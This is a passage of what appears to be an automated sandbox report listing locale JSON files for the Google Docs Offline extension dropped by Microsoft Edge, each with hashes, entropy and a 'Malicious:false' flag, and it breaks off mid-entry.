                                                                                                                                                                                    Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):961
                                                                                                                                                                                    Entropy (8bit):4.537633413451255
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                    MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                    SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                    SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                    SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):959
                                                                                                                                                                                    Entropy (8bit):4.570019855018913
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                    MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                    SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                    SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                    SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):968
                                                                                                                                                                                    Entropy (8bit):4.633956349931516
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                    MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                    SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                    SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                    SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):838
                                                                                                                                                                                    Entropy (8bit):4.4975520913636595
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                    MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                    SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                    SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                    SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1305
                                                                                                                                                                                    Entropy (8bit):4.673517697192589
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                    MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                    SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                    SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                    SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):911
                                                                                                                                                                                    Entropy (8bit):4.6294343834070935
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                    MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                    SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                    SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                    SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):939
                                                                                                                                                                                    Entropy (8bit):4.451724169062555
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                    MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                    SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                    SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                    SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):977
                                                                                                                                                                                    Entropy (8bit):4.622066056638277
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                    MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                    SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                    SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                    SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):972
                                                                                                                                                                                    Entropy (8bit):4.621319511196614
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                    MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                    SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                    SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                    SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):990
                                                                                                                                                                                    Entropy (8bit):4.497202347098541
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                    MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                    SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                    SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                    SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1658
                                                                                                                                                                                    Entropy (8bit):4.294833932445159
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                    MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                    SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                    SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                    SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1672
                                                                                                                                                                                    Entropy (8bit):4.314484457325167
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                    MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                    SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                    SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                    SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):935
                                                                                                                                                                                    Entropy (8bit):4.6369398601609735
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                    MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                    SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                    SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                    SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1065
                                                                                                                                                                                    Entropy (8bit):4.816501737523951
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                    MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                    SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                    SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                    SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2771
                                                                                                                                                                                    Entropy (8bit):3.7629875118570055
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                    MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                    SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                    SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                    SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):858
                                                                                                                                                                                    Entropy (8bit):4.474411340525479
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                    MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                    SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
